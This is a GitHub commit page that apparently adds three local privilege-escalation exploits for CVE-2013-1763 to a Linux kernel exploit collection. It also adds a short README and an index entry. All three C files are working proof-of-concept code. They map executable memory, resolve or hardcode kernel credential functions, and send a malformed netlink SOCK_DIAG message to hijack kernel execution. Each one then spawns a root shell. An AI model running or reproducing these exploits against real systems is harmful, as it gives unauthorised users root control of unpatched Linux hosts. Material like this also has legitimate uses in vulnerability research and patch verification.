Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit bfd62a4

Browse files
linux-exp
1 parent 5be961b commit bfd62a4

File tree

5 files changed

+325
-0
lines changed

5 files changed

+325
-0
lines changed

‎2013/CVE-2013-1763/24555.c‎

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
// archer.c
2+
//
3+
// 2012 sd@fucksheep.org
4+
//
5+
// Works reliably against x86-64 3.3-3.7 arch.
6+
//
7+
// Tested against:
8+
//
9+
// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
10+
// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
11+
// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
12+
// ...
13+
14+
#include <assert.h>
15+
16+
#define JUMP 0x0000100000001000LL
17+
#define BASE 0x380000000
18+
#define SIZE 0x010000000
19+
#define KSIZE 0x2000000
20+
21+
static long ugid;
22+
23+
void patch_current() {
24+
int i,j,k;
25+
char *current = *(char**)(((long)&i) & (-8192));
26+
long kbase = ((long)current)>>36;
27+
28+
for (i=0; i<4000; i+=4) {
29+
long *p = (void *)&current[i];
30+
int *t = (void*) p[0];
31+
if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
32+
for (j=0; j<20; j++) {
33+
for (k = 0; k < 8; k++)
34+
if (((int*)&ugid)[k%2] != t[j+k]) goto next;
35+
for (i = 0; i < 8; i++) t[j+i] = 0;
36+
for (i = 0; i < 10; i++) t[j+9+i] = -1;
37+
return;
38+
next:; }
39+
}
40+
}
41+
42+
43+
int main()
44+
{
45+
long u = getuid();
46+
long g = getgid();
47+
int i, f = socket(16,3,4);
48+
static int n[10] = {40,0x10014,0,0,45,-1};
49+
50+
assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);
51+
52+
setresuid(u,u,u); setresgid(g,g,g);
53+
ugid = (g<<32)|u;
54+
55+
memcpy(1<<12, &patch_current, 1024);
56+
for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;
57+
send(f, n, sizeof(n), 0);
58+
setuid(0);
59+
return execl("/bin/bash", "-sh", 0);
60+
}

‎2013/CVE-2013-1763/24746.c‎

Lines changed: 75 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,75 @@
1+
#include <unistd.h>
2+
#include <sys/socket.h>
3+
#include <linux/netlink.h>
4+
#include <netinet/tcp.h>
5+
#include <errno.h>
6+
#include <linux/if.h>
7+
#include <linux/filter.h>
8+
#include <string.h>
9+
#include <stdio.h>
10+
#include <stdlib.h>
11+
#include <linux/sock_diag.h>
12+
#include <linux/inet_diag.h>
13+
#include <linux/unix_diag.h>
14+
#include <sys/mman.h>
15+
16+
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
17+
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
18+
_commit_creds commit_creds;
19+
_prepare_kernel_cred prepare_kernel_cred;
20+
unsigned long sock_diag_handlers, nl_table;
21+
22+
int __attribute__((regparm(3)))
23+
x()
24+
{
25+
commit_creds(prepare_kernel_cred(0));
26+
return -1;
27+
}
28+
29+
char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
30+
31+
int main() {
32+
int fd;
33+
unsigned long mmap_start, mmap_size = 0x10000;
34+
unsigned family;
35+
struct {
36+
struct nlmsghdr nlh;
37+
struct unix_diag_req r;
38+
} req;
39+
char buf[8192];
40+
41+
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
42+
printf("Can't create sock diag socket\n");
43+
return -1;
44+
}
45+
46+
memset(&req, 0, sizeof(req));
47+
req.nlh.nlmsg_len = sizeof(req);
48+
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
49+
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
50+
req.nlh.nlmsg_seq = 123456;
51+
52+
req.r.udiag_states = -1;
53+
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
54+
55+
/* Ubuntu 12.10 x86_64 */
56+
req.r.sdiag_family = 0x37;
57+
commit_creds = (_commit_creds) 0xffffffff8107d180;
58+
prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
59+
mmap_start = 0x1a000;
60+
61+
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
62+
MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
63+
64+
printf("mmap fault\n");
65+
exit(1);
66+
}
67+
68+
*(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
69+
memset((void *)mmap_start, 0x90, mmap_size);
70+
memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));
71+
72+
send(fd, &req, sizeof(req), 0);
73+
if(!getuid())
74+
system("/bin/sh");
75+
}

‎2013/CVE-2013-1763/33336.c‎

Lines changed: 164 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,164 @@
1+
/*
2+
* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
3+
* bug found by Spender
4+
* poc by SynQ
5+
*
6+
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
7+
* using nl_table->hash.rehash_time, index 81
8+
*
9+
* Fedora 18 support added
10+
*
11+
* 2/2013
12+
*/
13+
14+
#include <unistd.h>
15+
#include <sys/socket.h>
16+
#include <linux/netlink.h>
17+
#include <netinet/tcp.h>
18+
#include <errno.h>
19+
#include <linux/if.h>
20+
#include <linux/filter.h>
21+
#include <string.h>
22+
#include <stdio.h>
23+
#include <stdlib.h>
24+
#include <linux/sock_diag.h>
25+
#include <linux/inet_diag.h>
26+
#include <linux/unix_diag.h>
27+
#include <sys/mman.h>
28+
29+
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
30+
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
31+
_commit_creds commit_creds;
32+
_prepare_kernel_cred prepare_kernel_cred;
33+
unsigned long sock_diag_handlers, nl_table;
34+
35+
int __attribute__((regparm(3)))
36+
kernel_code()
37+
{
38+
commit_creds(prepare_kernel_cred(0));
39+
return -1;
40+
}
41+
42+
int jump_payload_not_used(void *skb, void *nlh)
43+
{
44+
asm volatile (
45+
"mov $kernel_code, %eax\n"
46+
"call *%eax\n"
47+
);
48+
}
49+
50+
unsigned long
51+
get_symbol(char *name)
52+
{
53+
FILE *f;
54+
unsigned long addr;
55+
char dummy, sym[512];
56+
int ret = 0;
57+
58+
f = fopen("/proc/kallsyms", "r");
59+
if (!f) {
60+
return 0;
61+
}
62+
63+
while (ret != EOF) {
64+
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
65+
if (ret == 0) {
66+
fscanf(f, "%s\n", sym);
67+
continue;
68+
}
69+
if (!strcmp(name, sym)) {
70+
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
71+
fclose(f);
72+
return addr;
73+
}
74+
}
75+
fclose(f);
76+
77+
return 0;
78+
}
79+
80+
int main(int argc, char*argv[])
81+
{
82+
int fd;
83+
unsigned family;
84+
struct {
85+
struct nlmsghdr nlh;
86+
struct unix_diag_req r;
87+
} req;
88+
char buf[8192];
89+
90+
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
91+
printf("Can't create sock diag socket\n");
92+
return -1;
93+
}
94+
95+
memset(&req, 0, sizeof(req));
96+
req.nlh.nlmsg_len = sizeof(req);
97+
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
98+
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
99+
req.nlh.nlmsg_seq = 123456;
100+
101+
//req.r.sdiag_family = 89;
102+
req.r.udiag_states = -1;
103+
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
104+
105+
if(argc==1){
106+
printf("Run: %s Fedora|Ubuntu\n",argv[0]);
107+
return 0;
108+
}
109+
else if(strcmp(argv[1],"Fedora")==0){
110+
commit_creds = (_commit_creds) get_symbol("commit_creds");
111+
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
112+
sock_diag_handlers = get_symbol("sock_diag_handlers");
113+
nl_table = get_symbol("nl_table");
114+
115+
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
116+
printf("some symbols are not available!\n");
117+
exit(1);
118+
}
119+
120+
family = (nl_table - sock_diag_handlers) / 4;
121+
printf("family=%d\n",family);
122+
req.r.sdiag_family = family;
123+
124+
if(family>255){
125+
printf("nl_table is too far!\n");
126+
exit(1);
127+
}
128+
}
129+
else if(strcmp(argv[1],"Ubuntu")==0){
130+
commit_creds = (_commit_creds) 0xc106bc60;
131+
prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
132+
req.r.sdiag_family = 81;
133+
}
134+
135+
unsigned long mmap_start, mmap_size;
136+
mmap_start = 0x10000;
137+
mmap_size = 0x120000;
138+
printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
139+
140+
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
141+
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
142+
printf("mmap fault\n");
143+
exit(1);
144+
}
145+
memset((void*)mmap_start, 0x90, mmap_size);
146+
147+
char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
148+
unsigned long *asd = &jump[4];
149+
*asd = (unsigned long)kernel_code;
150+
151+
memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
152+
153+
if ( send(fd, &req, sizeof(req), 0) < 0) {
154+
printf("bad send\n");
155+
close(fd);
156+
return -1;
157+
}
158+
159+
printf("uid=%d, euid=%d\n",getuid(), geteuid() );
160+
161+
if(!getuid())
162+
system("/bin/sh");
163+
164+
}

‎2013/CVE-2013-1763/README.md‎

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
# CVE-2013-1763
2+
```
3+
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c
4+
in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
5+
```
6+
7+
Vulnerability reference:
8+
* [CVE-2013-1763](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763)
9+
* [exp-db](https://www.exploit-db.com/exploits/33336/)
10+
* [exp-db](https://www.exploit-db.com/exploits/24746/)
11+
* [exp-db](https://www.exploit-db.com/exploits/24555/)
12+
13+
## Kernels
14+
```
15+
3.3-3.8
16+
```
17+
18+
19+
## References
20+
* [Linux Kernel CVE-2013-1763 Local Privilege Escalation Vulnerability](http://www.securityfocus.com/bid/58137/exploit)
21+
* [linux kernel 本地提权漏洞CVE-2013-1763 exploit 代码分析](https://my.oschina.net/fgq611/blog/181812)
22+
23+

‎README.md‎

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -48,6 +48,9 @@ linux-kernel-exploits
4848
- [CVE-2013-2094](./2013/CVE-2013-2094) [perf_swevent]
4949
(3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2, 3.3, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.4.4, 3.4.5, 3.4.6, 3.4.8, 3.4.9, 3.5, 3.6, 3.7, 3.8.0, 3.8.1, 3.8.2, 3.8.3, 3.8.4, 3.8.5, 3.8.6, 3.8.7, 3.8.8, 3.8.9)
5050

51+
- [CVE-2013-1763](./2013/CVE-2013-1763) [__sock_diag_rcv_msg]
52+
(3.3-3.8)
53+
5154
- [CVE-2013-0268](./2013/CVE-2013-0268) [msr]
5255
(2.6.18, 2.6.19, 2.6.20, 2.6.21, 2.6.22, 2.6.23, 2.6.24, 2.6.25, 2.6.26, 2.6.27, 2.6.27, 2.6.28, 2.6.29, 2.6.30, 2.6.31, 2.6.32, 2.6.33, 2.6.34, 2.6.35, 2.6.36, 2.6.37, 2.6.38, 2.6.39, 3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2, 3.3, 3.4, 3.5, 3.6, 3.7.0, 3.7.6)
5356

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /